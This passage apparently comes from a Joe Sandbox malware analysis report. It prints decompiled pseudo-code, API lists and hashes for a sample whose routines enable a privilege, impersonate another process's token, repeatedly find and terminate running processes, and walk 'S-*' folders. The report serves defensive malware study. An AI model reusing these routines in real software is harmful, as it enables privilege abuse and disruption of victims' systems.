					 *_t9 =  *_t9 << 9;
					NtSetInformationProcess(0xffffffff, 0x12, _t9, 2); // executed
					 *_t9 = 7;
					NtSetInformationProcess(0xffffffff, 0xc, _t9, 4); // executed
					return E00D068B4(_t9);
				}
				return _t1;
			}





                  0x00d0b693
                  0x00d0b698
                  0x00d0b69c
                  0x00d0b69e
                  0x00d0b6ad
                  0x00d0b6b3
                  0x00d0b6bf
                  0x00d0b6c5
                  0x00d0b6d4
                  0x00000000
                  0x00d0b6db
                  0x00d0b6e1

                  APIs
                  • NtSetInformationProcess.NTDLL(000000FF,00000021,00000000,00000004,00000004,00000000,00D1712D), ref: 00D0B6AD
                  • NtSetInformationProcess.NTDLL(000000FF,00000012,00000000,00000002), ref: 00D0B6BF
                  • NtSetInformationProcess.NTDLL(000000FF,0000000C,00000000,00000004), ref: 00D0B6D4
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationProcess
                  • String ID:
                  • API String ID: 1801817001-0
                  • Opcode ID: 195ac8f5c32c9d1bb72377da027f44213b511654321e78931ff2db9185812850
                  • Instruction ID: af710ae8dcdb628f0a53b5b9b123b2a6a68884bc62b98d25e58593b115d97dc3
                  • Opcode Fuzzy Hash: 195ac8f5c32c9d1bb72377da027f44213b511654321e78931ff2db9185812850
                  • Instruction Fuzzy Hash: 47F0F8B1240714AFEB21AB949C8AF15379CDB16721F9403A0B631DD1DAD7B084458772
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07E28 Relevance: 3.1, APIs: 2, Instructions: 73sleepnativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 47%
                  			E00D07E28() {
				char _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				char _v48;
				long _t32;
				void* _t34;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t46;

				while(1) {
					_v12 = 0x400;
					_v16 = E00D06830(_v12);
					while(1) {
						_t32 = NtQuerySystemInformation(5, _v16, _v12,  &_v12); // executed
						if(_t32 == 0) {
							break;
						}
						if(_t32 != 0xc0000004) {
							return E00D0684C(_v16);
						}
						_t34 = E00D06868(_v16, _v12); // executed
						_v16 = _t34;
					}
					_t44 = _v16;
					do {
						_t46 =  *_t44;
						if( *((intOrPtr*)(_t44 + 0x3c)) != 0 && E00D07F20( *((intOrPtr*)(_t44 + 0x3c))) != 0) {
							_v24 =  *((intOrPtr*)(_t44 + 0x44));
							_v20 = 0;
							_t45 =  &_v48;
							 *_t45 = 0x18;
							 *((intOrPtr*)(_t45 + 4)) = 0;
							 *((intOrPtr*)(_t45 + 8)) = 0;
							 *((intOrPtr*)(_t45 + 0xc)) = 0;
							 *((intOrPtr*)(_t45 + 0x10)) = 0;
							 *((intOrPtr*)(_t45 + 0x14)) = 0;
							_push( &_v24);
							_push( &_v48);
							_push(1);
							_push( &_v8);
							if( *0xd25474() == 0) {
								 *0xd254c8(_v8, 0);
								 *0xd254d0(_v8);
							}
						}
						_t44 = _t44 + _t46;
					} while (_t46 != 0);
					E00D0684C(_v16); // executed
					Sleep(0x7d0); // executed
				}
			}














                  0x00d07e30
                  0x00d07e30
                  0x00d07e3f
                  0x00d07e42
                  0x00d07e4e
                  0x00d07e56
                  0x00000000
                  0x00000000
                  0x00d07e61
                  0x00d07e82
                  0x00d07e82
                  0x00d07e69
                  0x00d07e6e
                  0x00d07e6e
                  0x00d07e85
                  0x00d07e88
                  0x00d07e88
                  0x00d07e8e
                  0x00d07e9f
                  0x00d07ea2
                  0x00d07ea9
                  0x00d07eac
                  0x00d07eb2
                  0x00d07eb9
                  0x00d07ec0
                  0x00d07ec7
                  0x00d07ece
                  0x00d07ed8
                  0x00d07edc
                  0x00d07edd
                  0x00d07ee2
                  0x00d07eeb
                  0x00d07ef2
                  0x00d07efb
                  0x00d07efb
                  0x00d07eeb
                  0x00d07f01
                  0x00d07f04
                  0x00d07f0b
                  0x00d07f15
                  0x00d07f15

                  APIs
                    • Part of subcall function 00D06830: RtlAllocateHeap.NTDLL(?,00000008,00000000,?,00D176B5,?,00000000,00000000), ref: 00D06841
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D07E4E
                  • Sleep.KERNELBASE(000007D0,?), ref: 00D07F15
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapInformationQuerySleepSystem
                  • String ID:
                  • API String ID: 3184523392-0
                  • Opcode ID: 23a19faac96cb1eeab66a0c8329d54a7d8d0faabb107b2411ff2130b84cfad21
                  • Instruction ID: b3868fae8a102ed52cbe1b129c50a7d5a7b857fdd51835e9217975c1d5cef97f
                  • Opcode Fuzzy Hash: 23a19faac96cb1eeab66a0c8329d54a7d8d0faabb107b2411ff2130b84cfad21
                  • Instruction Fuzzy Hash: 14216D71D04209EFDF119F90DC44BDEBBB8EF04304F608095E918AA2A1D772AA56DFB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D08F36 Relevance: 3.1, APIs: 2, Instructions: 70nativethreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 48%
                  			E00D08F36() {
				char _v8;
				void _v12;
				char _v13;
				void* _t22;
				void _t26;
				long _t28;
				void* _t30;

				_v8 = 0;
				_v12 = 0;
				_v13 = 0;
				RtlAdjustPrivilege(0x14, 1, 0,  &_v13); // executed
				_t22 = E00D097A8(0xffffffffc1fa6a5a); // executed
				if(_t22 != 0) {
					_t26 = E00D09850(_t22, 2, 2); // executed
					_v12 = _t26;
					if(_v12 != 0) {
						_t28 = NtSetInformationThread(0xfffffffe, 5,  &_v12, 4); // executed
						if(_t28 == 0) {
							 *0xd254d0(_v12);
							_v12 = 0;
							_t30 = E00D08D78(); // executed
							if(_t30 != 0) {
								_v12 = E00D09850(_t30, 2, 2);
								if(_v12 != 0) {
									_push(4);
									_push( &_v12);
									_push(5);
									_push(0xfffffffe);
									if( *0xd25498() == 0 && E00D08BB0() != 0) {
										_v8 = 1;
									}
								}
							}
						}
					}
				}
				if(_v12 != 0) {
					 *0xd254d0(_v12);
				}
				if(_v8 != 0) {
					E00D08E9C();
				}
				return _v8;
			}










                  0x00d08f3e
                  0x00d08f45
                  0x00d08f4c
                  0x00d08f5a
                  0x00d08f6b
                  0x00d08f72
                  0x00d08f79
                  0x00d08f7e
                  0x00d08f85
                  0x00d08f91
                  0x00d08f99
                  0x00d08f9e
                  0x00d08fa4
                  0x00d08fab
                  0x00d08fb2
                  0x00d08fbe
                  0x00d08fc5
                  0x00d08fc7
                  0x00d08fcc
                  0x00d08fcd
                  0x00d08fcf
                  0x00d08fd9
                  0x00d08fe4
                  0x00d08fe4
                  0x00d08fd9
                  0x00d08fc5
                  0x00d08fb2
                  0x00d08f99
                  0x00d08f85
                  0x00d08fef
                  0x00d08ff4
                  0x00d08ff4
                  0x00d08ffe
                  0x00d09000
                  0x00d09000
                  0x00d0900b

                  APIs
                  • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000000), ref: 00D08F5A
                    • Part of subcall function 00D097A8: NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                    • Part of subcall function 00D09850: NtClose.NTDLL(00000000), ref: 00D09941
                  • NtSetInformationThread.NTDLL(000000FE,00000005,00000000,00000004,00000000,00000002,00000002,89F9D59D), ref: 00D08F91
                    • Part of subcall function 00D08D78: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,25DD2DA4), ref: 00D08DB6
                    • Part of subcall function 00D08D78: OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 00D08E24
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationOpen$AdjustCloseManagerPrivilegeQueryServiceSystemThread
                  • String ID:
                  • API String ID: 472716712-0
                  • Opcode ID: 32593292b36d92cbe1c3ee710c86c3e1bac034e2f5fd90392e5ef87ae60bcbb1
                  • Instruction ID: 75e311b93eff89b6230d9f71eec4acc8a63ae165356eec523d23af6a7efeca53
                  • Opcode Fuzzy Hash: 32593292b36d92cbe1c3ee710c86c3e1bac034e2f5fd90392e5ef87ae60bcbb1
                  • Instruction Fuzzy Hash: DE216270904309BBEB20ABB0CC4EF9EBAB99F00325F144154B658F61D1EBB08A85DB71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D08F38 Relevance: 3.1, APIs: 2, Instructions: 69nativethreadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 48%
                  			E00D08F38() {
				char _v8;
				void _v12;
				char _v13;
				void* _t22;
				void _t26;
				long _t28;
				void* _t30;

				_v8 = 0;
				_v12 = 0;
				_v13 = 0;
				RtlAdjustPrivilege(0x14, 1, 0,  &_v13); // executed
				_t22 = E00D097A8(0xffffffffc1fa6a5a); // executed
				if(_t22 != 0) {
					_t26 = E00D09850(_t22, 2, 2); // executed
					_v12 = _t26;
					if(_v12 != 0) {
						_t28 = NtSetInformationThread(0xfffffffe, 5,  &_v12, 4); // executed
						if(_t28 == 0) {
							 *0xd254d0(_v12);
							_v12 = 0;
							_t30 = E00D08D78(); // executed
							if(_t30 != 0) {
								_v12 = E00D09850(_t30, 2, 2);
								if(_v12 != 0) {
									_push(4);
									_push( &_v12);
									_push(5);
									_push(0xfffffffe);
									if( *0xd25498() == 0 && E00D08BB0() != 0) {
										_v8 = 1;
									}
								}
							}
						}
					}
				}
				if(_v12 != 0) {
					 *0xd254d0(_v12);
				}
				if(_v8 != 0) {
					E00D08E9C();
				}
				return _v8;
			}










                  0x00d08f3e
                  0x00d08f45
                  0x00d08f4c
                  0x00d08f5a
                  0x00d08f6b
                  0x00d08f72
                  0x00d08f79
                  0x00d08f7e
                  0x00d08f85
                  0x00d08f91
                  0x00d08f99
                  0x00d08f9e
                  0x00d08fa4
                  0x00d08fab
                  0x00d08fb2
                  0x00d08fbe
                  0x00d08fc5
                  0x00d08fc7
                  0x00d08fcc
                  0x00d08fcd
                  0x00d08fcf
                  0x00d08fd9
                  0x00d08fe4
                  0x00d08fe4
                  0x00d08fd9
                  0x00d08fc5
                  0x00d08fb2
                  0x00d08f99
                  0x00d08f85
                  0x00d08fef
                  0x00d08ff4
                  0x00d08ff4
                  0x00d08ffe
                  0x00d09000
                  0x00d09000
                  0x00d0900b

                  APIs
                  • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,00000000), ref: 00D08F5A
                    • Part of subcall function 00D097A8: NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D097D5
                    • Part of subcall function 00D09850: NtClose.NTDLL(00000000), ref: 00D09941
                  • NtSetInformationThread.NTDLL(000000FE,00000005,00000000,00000004,00000000,00000002,00000002,89F9D59D), ref: 00D08F91
                    • Part of subcall function 00D08D78: OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,25DD2DA4), ref: 00D08DB6
                    • Part of subcall function 00D08D78: OpenServiceW.ADVAPI32(00000000,?,00000014), ref: 00D08E24
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationOpen$AdjustCloseManagerPrivilegeQueryServiceSystemThread
                  • String ID:
                  • API String ID: 472716712-0
                  • Opcode ID: 36dc15edc76031f29c3935874af7b5c3cb138115cc8fe3010881194b882ee4f6
                  • Instruction ID: 4ebbb4bb370a92d433c58defbfb1137481f359e92d944d9d6461b9e9632f681b
                  • Opcode Fuzzy Hash: 36dc15edc76031f29c3935874af7b5c3cb138115cc8fe3010881194b882ee4f6
                  • Instruction Fuzzy Hash: 9F218470904309BBEB20ABB0CC4EF9EBBB99F00315F144154B658F61D1EBB08A85DB71
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0748C Relevance: 3.1, APIs: 2, Instructions: 60fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E00D0748C(intOrPtr _a4) {
				void* _v8;
				char _v16;
				short _v536;
				struct _WIN32_FIND_DATAW _v1128;
				void* _t22;
				intOrPtr* _t25;
				int _t32;
				void* _t35;
				union _LARGE_INTEGER* _t41;
				void* _t42;
				void* _t43;

				_t22 = E00D07560(_a4,  &_v536); // executed
				if(_t22 != 0) {
					E00D016D0( &_v536);
					_t25 =  &_v16;
					 *_t25 = 0x2d0053;
					 *((intOrPtr*)(_t25 + 4)) = 0x2a;
					 *0xd25440( &_v536, _t25);
					_t43 = _t42 + 8;
					_t22 = FindFirstFileExW( &_v536, 0,  &_v1128, 0, 0, 0); // executed
					_v8 = _t22;
					if(_v8 != 0xffffffff) {
						do {
							if((_v1128.dwFileAttributes & 0x00000010) != 0) {
								_t35 =  *0xd25450( &_v536, 0x5c);
								 *0xd25444(_t35 + 2,  &(_v1128.cFileName));
								_t43 = _t43 + 0x10;
								E00D0763C(_t41,  &_v536); // executed
							}
							_t32 = FindNextFileW(_v8,  &_v1128); // executed
						} while (_t32 != 0);
						return  *0xd25510(_v8);
					}
				}
				return _t22;
			}














                  0x00d0749f
                  0x00d074a6
                  0x00d074b3
                  0x00d074b8
                  0x00d074bb
                  0x00d074c1
                  0x00d074d0
                  0x00d074d6
                  0x00d074ef
                  0x00d074f5
                  0x00d074fc
                  0x00d074fe
                  0x00d07508
                  0x00d07513
                  0x00d07527
                  0x00d0752d
                  0x00d07537
                  0x00d07537
                  0x00d07546
                  0x00d0754c
                  0x00000000
                  0x00d07553
                  0x00d074fc
                  0x00d0755c

                  APIs
                    • Part of subcall function 00D07560: FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00D075CF
                    • Part of subcall function 00D07560: FindClose.KERNELBASE(000000FF), ref: 00D0762C
                  • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00D074EF
                  • FindNextFileW.KERNELBASE(000000FF,?), ref: 00D07546
                    • Part of subcall function 00D0763C: FindFirstFileExW.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000), ref: 00D076C3
                    • Part of subcall function 00D0763C: GetFileAttributesW.KERNELBASE(00000000), ref: 00D07756
                    • Part of subcall function 00D0763C: FindNextFileW.KERNELBASE(000000FF,?), ref: 00D077BF
                    • Part of subcall function 00D0763C: FindClose.KERNELBASE(000000FF), ref: 00D077D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$First$CloseNext$Attributes
                  • String ID:
                  • API String ID: 1082676904-0
                  • Opcode ID: 17156dc57b48b0bbbf67409f97a49772d5254da850a6cc37970c5401e8c382fd
                  • Instruction ID: f6f56228797eb9f4f513698ad3ae384df9caf351d80d6b0c4df846b68df5af29
                  • Opcode Fuzzy Hash: 17156dc57b48b0bbbf67409f97a49772d5254da850a6cc37970c5401e8c382fd
                  • Instruction Fuzzy Hash: 0D210BB194020DABDB20EFA0DD4DFD9B77CAB14301F4444A1AA0DE6191E735AB558F72
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07560 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileExW.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00D075CF
                  • FindClose.KERNELBASE(000000FF), ref: 00D0762C
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFileFirst
                  • String ID:
                  • API String ID: 2295610775-0
                  • Opcode ID: b05c10cfc710e7d34f736034b5896ab5507f8e7b6a2dad09ba67d373a493b97a
                  • Instruction ID: 27b1757f7a1947350bec2f5f7de96acb3a745b1bcba78c3d09016322ae47a981
                  • Opcode Fuzzy Hash: b05c10cfc710e7d34f736034b5896ab5507f8e7b6a2dad09ba67d373a493b97a
                  • Instruction Fuzzy Hash: 1021F170800608EFDB209F54ED0CF99BBB9FB04305F544191E509EA2A1D7759A99CF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07E5A Relevance: 3.1, APIs: 2, Instructions: 56sleepnativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 48%
                  			E00D07E5A() {
				long _t31;
				void* _t33;
				void* _t45;
				intOrPtr* _t46;
				void _t48;
				void* _t49;

				while(1) {
					L2:
					_t31 = NtQuerySystemInformation(5,  *(_t49 - 0xc),  *(_t49 - 8), _t49 - 8); // executed
					if(_t31 != 0) {
						break;
					}
					_t45 =  *(_t49 - 0xc);
					do {
						_t48 =  *_t45;
						if( *((intOrPtr*)(_t45 + 0x3c)) != 0 && E00D07F20( *((intOrPtr*)(_t45 + 0x3c))) != 0) {
							 *((intOrPtr*)(_t49 - 0x14)) =  *((intOrPtr*)(_t45 + 0x44));
							 *((intOrPtr*)(_t49 - 0x10)) = 0;
							_t46 = _t49 - 0x2c;
							 *_t46 = 0x18;
							 *((intOrPtr*)(_t46 + 4)) = 0;
							 *((intOrPtr*)(_t46 + 8)) = 0;
							 *((intOrPtr*)(_t46 + 0xc)) = 0;
							 *((intOrPtr*)(_t46 + 0x10)) = 0;
							 *((intOrPtr*)(_t46 + 0x14)) = 0;
							_push(_t49 - 0x14);
							_push(_t49 - 0x2c);
							_push(1);
							_push(_t49 - 4);
							if( *0xd25474() == 0) {
								 *0xd254c8( *((intOrPtr*)(_t49 - 4)), 0);
								 *0xd254d0( *((intOrPtr*)(_t49 - 4)));
							}
						}
						_t45 = _t45 + _t48;
					} while (_t48 != 0);
					E00D0684C( *(_t49 - 0xc)); // executed
					Sleep(0x7d0); // executed
					 *(_t49 - 8) = 0x400;
					 *(_t49 - 0xc) = E00D06830( *(_t49 - 8));
				}
				if(_t31 == 0xc0000004) {
					_t33 = E00D06868( *(_t49 - 0xc),  *(_t49 - 8)); // executed
					 *(_t49 - 0xc) = _t33;
					goto L2;
				}
				return E00D0684C( *(_t49 - 0xc));
			}









                  0x00d07e42
                  0x00d07e42
                  0x00d07e4e
                  0x00d07e56
                  0x00000000
                  0x00000000
                  0x00d07e85
                  0x00d07e88
                  0x00d07e88
                  0x00d07e8e
                  0x00d07e9f
                  0x00d07ea2
                  0x00d07ea9
                  0x00d07eac
                  0x00d07eb2
                  0x00d07eb9
                  0x00d07ec0
                  0x00d07ec7
                  0x00d07ece
                  0x00d07ed8
                  0x00d07edc
                  0x00d07edd
                  0x00d07ee2
                  0x00d07eeb
                  0x00d07ef2
                  0x00d07efb
                  0x00d07efb
                  0x00d07eeb
                  0x00d07f01
                  0x00d07f04
                  0x00d07f0b
                  0x00d07f15
                  0x00d07e30
                  0x00d07e3f
                  0x00d07e3f
                  0x00d07e61
                  0x00d07e69
                  0x00d07e6e
                  0x00000000
                  0x00d07e6e
                  0x00d07e82

                  APIs
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D07E4E
                  • Sleep.KERNELBASE(000007D0,?), ref: 00D07F15
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationQuerySleepSystem
                  • String ID:
                  • API String ID: 3518162127-0
                  • Opcode ID: cc63ae8a06f292d9a48b73dc787d7f5e81bdbb5a9b448f513b1c9c35c713828d
                  • Instruction ID: e78449ebcfa9fceb2cf9861cc889029ecc5ee8ae704d455080d602729b41e97c
                  • Opcode Fuzzy Hash: cc63ae8a06f292d9a48b73dc787d7f5e81bdbb5a9b448f513b1c9c35c713828d
                  • Instruction Fuzzy Hash: 66213B71D04209EBDF11DF90D848BDDBB79FF04304F208095E908AA291D772AA46DFB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D07E73 Relevance: 3.1, APIs: 2, Instructions: 56sleepnativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 48%
                  			E00D07E73() {
				long _t31;
				void* _t33;
				void* _t45;
				intOrPtr* _t46;
				void _t48;
				void* _t49;

				while(1) {
					L2:
					_t31 = NtQuerySystemInformation(5,  *(_t49 - 0xc),  *(_t49 - 8), _t49 - 8); // executed
					if(_t31 != 0) {
						break;
					}
					_t45 =  *(_t49 - 0xc);
					do {
						_t48 =  *_t45;
						if( *((intOrPtr*)(_t45 + 0x3c)) != 0 && E00D07F20( *((intOrPtr*)(_t45 + 0x3c))) != 0) {
							 *((intOrPtr*)(_t49 - 0x14)) =  *((intOrPtr*)(_t45 + 0x44));
							 *((intOrPtr*)(_t49 - 0x10)) = 0;
							_t46 = _t49 - 0x2c;
							 *_t46 = 0x18;
							 *((intOrPtr*)(_t46 + 4)) = 0;
							 *((intOrPtr*)(_t46 + 8)) = 0;
							 *((intOrPtr*)(_t46 + 0xc)) = 0;
							 *((intOrPtr*)(_t46 + 0x10)) = 0;
							 *((intOrPtr*)(_t46 + 0x14)) = 0;
							_push(_t49 - 0x14);
							_push(_t49 - 0x2c);
							_push(1);
							_push(_t49 - 4);
							if( *0xd25474() == 0) {
								 *0xd254c8( *((intOrPtr*)(_t49 - 4)), 0);
								 *0xd254d0( *((intOrPtr*)(_t49 - 4)));
							}
						}
						_t45 = _t45 + _t48;
					} while (_t48 != 0);
					E00D0684C( *(_t49 - 0xc)); // executed
					Sleep(0x7d0); // executed
					 *(_t49 - 8) = 0x400;
					 *(_t49 - 0xc) = E00D06830( *(_t49 - 8));
				}
				if(_t31 == 0xc0000004) {
					_t33 = E00D06868( *(_t49 - 0xc),  *(_t49 - 8)); // executed
					 *(_t49 - 0xc) = _t33;
					goto L2;
				}
				return E00D0684C( *(_t49 - 0xc));
			}









                  0x00d07e42
                  0x00d07e42
                  0x00d07e4e
                  0x00d07e56
                  0x00000000
                  0x00000000
                  0x00d07e85
                  0x00d07e88
                  0x00d07e88
                  0x00d07e8e
                  0x00d07e9f
                  0x00d07ea2
                  0x00d07ea9
                  0x00d07eac
                  0x00d07eb2
                  0x00d07eb9
                  0x00d07ec0
                  0x00d07ec7
                  0x00d07ece
                  0x00d07ed8
                  0x00d07edc
                  0x00d07edd
                  0x00d07ee2
                  0x00d07eeb
                  0x00d07ef2
                  0x00d07efb
                  0x00d07efb
                  0x00d07eeb
                  0x00d07f01
                  0x00d07f04
                  0x00d07f0b
                  0x00d07f15
                  0x00d07e30
                  0x00d07e3f
                  0x00d07e3f
                  0x00d07e61
                  0x00d07e69
                  0x00d07e6e
                  0x00000000
                  0x00d07e6e
                  0x00d07e82

                  APIs
                  • NtQuerySystemInformation.NTDLL(00000005,?,00000400,00000400,00000400), ref: 00D07E4E
                  • Sleep.KERNELBASE(000007D0,?), ref: 00D07F15
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: InformationQuerySleepSystem
                  • String ID:
                  • API String ID: 3518162127-0
                  • Opcode ID: 9792a6a271885a5555b18342437b2c9bd387286691ea3d409f6d845e8b5f61a3
                  • Instruction ID: e78449ebcfa9fceb2cf9861cc889029ecc5ee8ae704d455080d602729b41e97c
                  • Opcode Fuzzy Hash: 9792a6a271885a5555b18342437b2c9bd387286691ea3d409f6d845e8b5f61a3
                  • Instruction Fuzzy Hash: 66213B71D04209EBDF11DF90D848BDDBB79FF04304F208095E908AA291D772AA46DFB0
                  Uniqueness

                  Uniqueness Score: -1.00%

